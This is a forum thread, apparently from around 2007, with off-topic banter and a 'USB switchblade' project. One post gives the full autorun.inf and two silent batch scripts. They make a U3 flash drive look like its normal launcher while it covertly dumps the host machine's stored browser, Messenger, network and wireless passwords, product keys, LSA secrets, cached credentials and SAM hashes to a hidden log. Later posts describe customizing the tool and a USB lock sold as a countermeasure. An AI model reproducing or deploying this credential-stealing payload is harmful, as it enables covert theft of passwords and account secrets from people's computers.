![]() |
|
|||||||
| Register | Search | Today's Posts | Mark Forums Read |
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
|
#46 (permalink) | |
|
Managing the iTards.
Join Date: Dec 2002
Location: Ohio
Posts: 5,259
|
Quote:
Do you really want me to post pictures of my hairy ass on the net? Cause I sure as hell know my cable modem doesn't!
__________________
Atheism is a non-prophet organization. |
|
|
|
|
|
|
#48 (permalink) | |
|
Did you do the math?
Join Date: Apr 2002
Location: Villa Straylight
Posts: 10,039
|
Quote:
I have to tell you, after all the hype about her topless shot in Swordfish, I was disappointed with the twins. I figured they'd be a lot perkier. That reminds me. I am still waiting for a FBI/CIA-supported evil crime lord to whisk me off to an after-hours rave club so I can get fellated while breaking 128-bit encryption. After all, I've broken WEP, that so I shouldn't have to wait too long. It happens to other hackers, right? I saw it in the movies, so it must be true. ![]()
__________________
Thorn "Lawyers should never marry lawyers. This is called inbreeding. It produces idiot children and more lawyers." |
|
|
|
|
|
|
#49 (permalink) | |
|
Psychic Amish Stumbler
Join Date: Jul 2004
Location: Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
Posts: 11,708
|
Quote:
Plus, I heard it happened to Waldo twice last week.
__________________
"One of these days, I'm going to cut you to pieces." If you're offended by this post, please feel free to report it to one of the many helpful moderators of this forum. Thank you. |
|
|
|
|
|
|
#50 (permalink) | |
|
Did you do the math?
Join Date: Apr 2002
Location: Villa Straylight
Posts: 10,039
|
Quote:
![]()
__________________
Thorn "Lawyers should never marry lawyers. This is called inbreeding. It produces idiot children and more lawyers." |
|
|
|
|
|
|
#51 (permalink) | |
|
Psychic Amish Stumbler
Join Date: Jul 2004
Location: Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
Posts: 11,708
|
Quote:
__________________
"One of these days, I'm going to cut you to pieces." If you're offended by this post, please feel free to report it to one of the many helpful moderators of this forum. Thank you. |
|
|
|
|
|
|
#52 (permalink) | ||
|
Managing the iTards.
Join Date: Dec 2002
Location: Ohio
Posts: 5,259
|
Quote:
Quote:
That would explain the heart thing.
__________________
Atheism is a non-prophet organization. |
||
|
|
|
|
|
#53 (permalink) |
|
root\.workspace\.garbage.
Join Date: Aug 2003
Posts: 4,765
|
If I was drunk I'd say that looks like Thorn and he was playing with his secret agent disguise kit.
__________________
It's not Intelligent Design, it's peer pressure. ┌──────────────────────────────┐ ╞ NS Icons Explained|et hoc genus omne ╡ └──────────────────────────────┘ |
|
|
|
|
|
#54 (permalink) | |
|
root\.workspace\.garbage.
Join Date: Aug 2003
Posts: 4,765
|
In case anyone is still playing around with this. I've got a version for U3 that allows you to keep your existing U3/Launchpad functionality and still have a switchblade that doesn't run from launchpad autostart.
Pros: Has built in immunity so you don't scan yourself. Finds U3 CDrom and flash partition stores logs on flash partition All tools stored in CD-ROM partition (now overzealous antivirus can't delete them) Cons: Changes to switchblade script or tools requires use of Universal customizer to rebuild CDrom partition image (takes about 1 hour) autorun.inf Code:
[AutoRun] open=START.exe icon=LaunchU3.exe,0 [Definitions] Launchpad=LaunchPad.exe Vtype=2 [CopyFiles] FileNumber=1 File1=LaunchPad.zip [Update] URL= Code:
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console,silent
@rem DestDirectory: current
@rem Icon: C:\Documents and Settings\dwk\Desktop\hacksaw\LAUNCHU3.EXE
@rem OutputFile: C:\Documents and Settings\dwk\Desktop\universal customizer\U3CUSTOM\START.exe
@rem ----- ExeScript Options End -----
@ECHO on
:: Thanks to Obi-Wahn
set MyComputers= Andreas_OBI-WAHN
:: It is IMPORTANT that Username and Hostname are as written as stored into the EnvVar
:: Change the combinations to your Settings. and then remove the Line below:
REM set MyComputers=%COMPUTERNAME%_%USERNAME%
set IgnoreMyComputers=Yes
:: This check is set here because it don't have to load all variables if it exits
Set Test=False
If %IgnoreMyComputers%==Yes (
for %%i in (%MyComputers%) do (
If %%i==%COMPUTERNAME%_%USERNAME% (
set Test=True
)
)
)
IF %Test%==True (
LaunchU3.exe -a
) ELSE (
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
IF EXIST %%i:\System\SRC\drv.dat (
SET sd=%%i:\System\SRC
)
)
LaunchU3.exe -a & \SRC\go.exe
)
:End
Exit
Code:
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console,silent
@rem DestDirectory: current
@rem Icon: none
@rem OutputFile: C:\Documents and Settings\dwk\Desktop\universal customizer\U3CUSTOM\SRC\GO.exe
@rem ----- ExeScript Options End -----
:: Props: Setzer1411, Marc, rpk5000, Gonzor
:: fd = flash partition (writable)
:: U3 = cdrom partition (readonly)
@ECHO off
CD ..\SRC >NUL
If %computername%.==. SET computername=computer
If %username%.==. SET username=None
:: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
IF EXIST %%i:\NUL.EXT (
IF EXIST %%i:\System\SRC\drv.dat (
SET fd=%%i:\System
)
)
IF EXIST %%i:\NUL.EXT (
IF EXIST %%i:\SRC\go.exe (
SET U3=%%i:\SRC
)
)
)
:: SET LOG PATHS
IF NOT EXIST %fd%\Logs\%computername% (
MD %fd%\Logs\%computername%
)
DIR /a-d /s "%fd%\Logs\%computername%" | FIND /c ".log" > "%fd%\SRC\###"
SET /p count=<"%fd%\SRC\###"
IF %count%.==. Set count=0
SET logdir=%fd%\Logs\%computername%
SET log="%fd%\Logs\%computername%\%computername%-[%count%].log"
SET tmplog="%fd%\Logs\%computername%\%computername%_TEMP.log"
SET include=%fd%\SRC\Include
SET /p eipurl=<"%fd%\SRC\Include\EIP.dat"
DEL /f /q "%fd%\SRC\###"
:: PAYLOAD
Echo +-----------------------------------+ > %log% 2>&1
Echo ¦ System info ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo Computer Name Is: %computername% And the Logged On User Name Is: %username% The date And Time Is: %date% %time% >> %log% 2>&1
ipconfig /all >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Shares ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
net share >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Users ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
net user >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ [Network Services] ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
netstat.exe -abn >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ [Port Scan] ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\portqry -local -l %tmplog% >> %log% 2>&1
COPY %log% + %tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump Product Keys ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo
.\produkey /nosavereg /stext %tmplog% /remote %computername% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump IE7 Secrets ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\iepv.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump LSA Secrets ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\pspv.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump Network PW ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\netpass.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
ECHO +-----------------------------------+ >> %log% 2>&1
ECHO ¦ [Dump Cache] ¦ >> %log% 2>&1
ECHO +-----------------------------------+ >> %log% 2>&1
.\cachedump.exe >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ FireFox Passwords ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\FirePassword.exe >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump Messenger PW ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\mspass.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Internet Explorer History ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\iehv.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump Wireless Key ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\wifike.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump URL History ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
cscript //nologo .\DUH.vbs >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump SAM ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\pwdump -o %tmplog% 127.0.0.1 >> %log% 2>&1
@echo on
CD /d %logdir% 2>&1
%\fgdump.exe -c >> %log% 2>&1
ECHO.¦ >> %log% 2>&1
ECHO -----Hashes-----¦ >> %log% 2>&1
ECHO.¦ >> %log% 2>&1
COPY %log% + %logdir%\127.0.0.1.pwdump %log% >> NUL
DEL /f /q %logdir%\127.0.0.1 >NUL
CD /d %
ECHO +-----------------------------------+ >> %log% 2>&1
ECHO ¦ [External IP] ¦ >> %log% 2>&1
ECHO +-----------------------------------+ >> %log% 2>&1
.\wget.exe %eipurl% --output-document=%tmplog% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Clipboard ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\nircmd.exe clipboard addfile %log%
:End
Exit
Why do you even need a switchblade? Quote:
__________________
It's not Intelligent Design, it's peer pressure. ┌──────────────────────────────┐ ╞ NS Icons Explained|et hoc genus omne ╡ └──────────────────────────────┘ Last edited by beakmyn : 07-23-2007 at 10:10 AM. |
|
|
|
|
|
|
#55 (permalink) | |
|
My search-fu is weak!
Join Date: Jun 2002
Location: West BFE, Texas
Posts: 409
|
Office Depot (Milwaukee) had the 2Gb U3 Cruzer Micro for $19.99 after instant discount today... picked one up for experimenting.
Quote:
![]()
__________________
--- <#include std.disclaimer.h> AltarThug of Wired and Unwired, The Church of WiFi http://www.churchofwifi.org http://www.linuxisforbitches.com http://www.wigle.net http://www.kismetwireless.net |
|
|
|
|
|
|
#56 (permalink) |
|
root\.workspace\.garbage.
Join Date: Aug 2003
Posts: 4,765
|
__________________
It's not Intelligent Design, it's peer pressure. ┌──────────────────────────────┐ ╞ NS Icons Explained|et hoc genus omne ╡ └──────────────────────────────┘ |
|
|
|
|
|
#57 (permalink) | |
|
My search-fu is weak!
Join Date: Jun 2002
Location: West BFE, Texas
Posts: 409
|
Quote:
![]()
__________________
--- <#include std.disclaimer.h> AltarThug of Wired and Unwired, The Church of WiFi http://www.churchofwifi.org http://www.linuxisforbitches.com http://www.wigle.net http://www.kismetwireless.net |
|
|
|
|
|
|
#58 (permalink) | ||||||
|
root\.workspace\.garbage.
Join Date: Aug 2003
Posts: 4,765
|
UPDATE: Using Gonzor's (hak.5 forum) approach I've added my little parts and
Basically, you have in your Flash partition System/src/Include/1-20.dat Based on which dat files exist you can control what gets run. I.E. I don't have 2.dat or 3.dat (hacksaw and vnc). This allows for a bit of customization iwithout having to re-compile the .ISO FD = flash partition U3 = CD partition Code:
Root of CD partition Quote:
Quote:
Quote:
Quote:
Quote:
Read the help file for info on the /r switch. Quote:
__________________
It's not Intelligent Design, it's peer pressure. ┌──────────────────────────────┐ ╞ NS Icons Explained|et hoc genus omne ╡ └──────────────────────────────┘ Last edited by beakmyn : 11-13-2007 at 10:59 AM. |
||||||
|
|
|
|
|
#59 (permalink) |
|
Psychic Amish Stumbler
Join Date: Jul 2004
Location: Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
Posts: 11,708
|
It would seem as though someone has finally come up with a good idea to prevent switchblade access.
ThinkGeek :: USB Security Lock They should sell an 'admin pack' of 100 or 500 locks.
__________________
"One of these days, I'm going to cut you to pieces." If you're offended by this post, please feel free to report it to one of the many helpful moderators of this forum. Thank you. |
|
|
|
|
|
#60 (permalink) | |
|
Pr0nStumbler Expert Level
Join Date: Apr 2003
Location: Houston
Posts: 2,349
|
Quote:
Level 0 = OFF Level 1 = Power, NO Data Level 2 = Power and Data allowed This way the sheeple could charge their cell phones etc no data. However, I can see where this would be useful if some idiot tried to boot off the USB before the OS and policies take effect
__________________
Against the run of the mill, static as it seems We break the surface tension with our wild kinetic dreams Curves and lines -- of grand designs... Tonight's movie "Soylent Green" has been brought to you by our sponsor - Waste Management My mind is like a Steel trap - Rusty and Illegal in most states |
|
|
|
|